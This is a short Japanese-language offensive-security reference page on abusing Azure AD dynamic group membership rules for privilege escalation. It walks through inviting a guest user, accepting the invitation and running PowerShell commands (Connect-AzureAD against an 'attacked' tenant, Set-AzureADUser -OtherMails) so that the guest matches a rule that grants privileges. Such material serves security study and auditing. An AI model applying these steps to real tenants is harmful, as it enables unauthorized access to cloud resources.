基本情報

Dynamic groups は、設定された一連の ルール を持つグループであり、ルールに一致する ユーザーまたはデバイス がグループに追加されます。ユーザーまたはデバイスの 属性 が 変更 されるたびに、動的ルールが 再チェック されます。そして 新しいルール が 作成 されると、すべてのデバイスとユーザーが チェック されます。

Dynamic groups には Azure RBAC ロール が割り当てられる可能性がありますが、AzureAD ロール を動的グループに追加することは できません。

この機能には Azure AD プレミアム P1 ライセンスが必要です。

特権昇格

デフォルトでは、Azure AD ではどのユーザーでもゲストを招待できるため、動的グループの ルール が 権限 をユーザーに与える場合、新しい ゲスト に設定できる 属性 に基づいて、その属性を持つゲストを作成して 特権を昇格 させることが可能です。また、ゲストは自分自身のプロファイルを管理し、これらの属性を変更することも可能です。

動的メンバーシップを許可するグループを取得: Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}

例

• ルール例: (user.otherMails -any (_ -contains "tester")) -and (user.userType -eq "guest")

• ルールの説明: 文字列 'tester' を持つセカンダリメールを持つ任意のゲストユーザーがグループに追加されます

1. Azure Active Directory に移動し、ユーザー をクリックして Want to switch back to the legacy users list experience? Click here to leave the preview をクリックします

2. New guest user をクリックして、メールを 招待 します

3. 招待状が送信されると、ユーザーのプロファイル が Azure AD に 追加 されます。ユーザーのプロファイルを開き、Invitation accepted の下の (manage) をクリックします。

4. Resend invite? を Yes に変更し、招待URLを取得します:

5. URL をコピーして 開き、招待されたユーザーとして ログイン し、招待を 受け入れ ます

6. ユーザーとしてログインし、セカンダリメールを設定します

# ログイン
$password = ConvertTo-SecureString 'password' - AsPlainText -Force
$creds = New-Object
System.Management.Automation.PSCredential('externaltester@somedomain.onmicrosoft.com', $Password)
Connect-AzureAD -Credential $creds -TenantId <tenant_id_of_attacked_domain>

# OtherMails 設定の変更
Set-AzureADUser -ObjectId <OBJECT-ID> -OtherMails <Username>@<TENANT_NAME>.onmicrosoft.com -Verbose

参考

• https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/